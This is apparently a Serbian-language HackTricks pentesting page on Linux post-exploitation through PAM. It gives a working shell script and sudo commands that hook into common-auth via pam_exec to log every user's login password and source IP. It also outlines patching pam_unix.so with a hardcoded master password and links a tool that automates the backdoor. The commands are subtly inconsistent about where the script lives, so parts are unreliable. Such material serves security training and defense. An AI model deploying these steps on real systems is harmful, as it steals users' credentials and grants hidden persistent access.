hacktricks/linux-hardening/linux-post-exploitation
2024-07-18 22:15:30 +00:00
..
pam-pluggable-authentication-modules.md Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:15:30 +00:00
README.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:27:34 +00:00

Linux Post-Eksploatacija

{% hint style="success" %} Naučite i vežbajte AWS Hakovanje:HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)
Naučite i vežbajte GCP Hakovanje: HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)

Podržite HackTricks
{% endhint %}

Snifovanje Logon Lozinki sa PAM

Konfigurišemo PAM modul da beleži svaku lozinku koju svaki korisnik koristi za prijavljivanje. Ako ne znate šta je PAM, proverite:

{% content-ref url="pam-pluggable-authentication-modules.md" %} pam-pluggable-authentication-modules.md {% endcontent-ref %}

Za dalje detalje proverite originalni post. Ovo je samo sažetak:

Pregled Tehnike: Pluggable Authentication Modules (PAM) nude fleksibilnost u upravljanju autentifikacijom na Unix baziranim sistemima. Mogu poboljšati bezbednost prilagođavanjem procesa prijavljivanja, ali takođe mogu predstavljati rizike ako se zloupotrebljavaju. Ovaj sažetak opisuje tehniku za hvatanje prijavljivačkih podataka korišćenjem PAM-a, zajedno sa strategijama za ublažavanje.

Hvatanje Podataka za Prijavljivanje:

  • Bash skripta nazvana toomanysecrets.sh je kreirana da beleži pokušaje prijavljivanja, hvatajući datum, korisničko ime ($PAM_USER), lozinku (putem stdin), i IP adresu udaljenog hosta ($PAM_RHOST) u /var/log/toomanysecrets.log.
  • Skripta je postavljena da bude izvršiva i integrisana u PAM konfiguraciju (common-auth) korišćenjem pam_exec.so modula sa opcijama za tiho izvršavanje i izlaganje autentifikacionog tokena skripti.
  • Pristup pokazuje kako kompromitovan Linux host može biti iskorišćen da diskretno beleži akreditive.
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
sudo nano /etc/pam.d/common-auth
# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
sudo chmod 700 /usr/local/bin/toomanysecrets.sh

Backdooring PAM

Za dodatne detalje pogledajte originalni post. Ovo je samo sažetak:

Pluggable Authentication Module (PAM) je sistem koji se koristi u Linuxu za autentikaciju korisnika. Radi na tri glavna koncepta: korisničko ime, šifra i servis. Konfiguracione datoteke za svaki servis se nalaze u direktorijumu /etc/pam.d/, gde deljene biblioteke rukuju autentikacijom.

Cilj: Modifikovati PAM kako bi omogućio autentikaciju sa određenom šifrom, zaobilazeći stvarnu korisničku šifru. Ovo je posebno usmereno na deljenu biblioteku pam_unix.so koja se koristi u fajlu common-auth, koji je uključen u gotovo sve servise za proveru šifre.

Koraci za Modifikaciju pam_unix.so:

  1. Locirajte Autentikacionu Direktivu u fajlu common-auth:
  • Linija odgovorna za proveru korisničke šifre poziva pam_unix.so.
  1. Modifikujte Izvorni Kod:
  • Dodajte uslovnu izjavu u izvorni fajl pam_unix_auth.c koja odobrava pristup ako se koristi unapred definisana šifra, inače nastavlja sa uobičajenim procesom autentikacije.
  1. Rekompajlirajte i Zamenite modifikovanu biblioteku pam_unix.so u odgovarajućem direktorijumu.
  2. Testiranje:
  • Pristup je odobren preko različitih servisa (login, ssh, sudo, su, screensaver) sa unapred definisanom šifrom, dok normalni procesi autentikacije ostaju nepromenjeni.

{% hint style="info" %} Možete automatizovati ovaj proces sa https://github.com/zephrax/linux-pam-backdoor {% endhint %}

{% hint style="success" %} Naučite i vežbajte hakovanje AWS:HackTricks Training AWS Red Team Expert (ARTE)
Naučite i vežbajte hakovanje GCP-a: HackTricks Training GCP Red Team Expert (GRTE)

Podržite HackTricks
{% endhint %}